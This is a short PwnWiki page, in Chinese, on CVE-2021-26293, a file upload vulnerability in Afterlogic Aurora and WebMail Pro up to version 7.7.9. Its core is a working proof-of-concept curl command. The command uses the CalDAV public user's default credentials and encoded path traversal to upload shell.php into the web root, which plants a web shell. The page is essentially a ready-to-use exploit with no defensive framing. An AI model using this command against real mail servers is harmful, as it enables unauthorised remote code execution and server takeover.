CVE-2021-26293 Afterlogic Aurora & WebMail Pro 文件上傳漏洞

From PwnWiki
Revision as of 10:48, 22 May 2021 by Pwnwiki (talk | contribs) (→‎POC)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

影響版本

WebMail Pro ≤ 7.7.9
Afterlogic Aurora ≤ 7.7.9

POC

curl -T shell.php -u 'caldav_public_user@localhost:caldav_public_user' "https://sample-mail.tld/dav/server.php/files/persona/%2e%2e/%2e%2e//%2e%2e//%2e%2e/data//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e//%2e%2e/var/www/html/shell.php"
Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-26293_Afterlogic_Aurora_%26_WebMail_Pro_文件上傳漏洞&oldid=3051"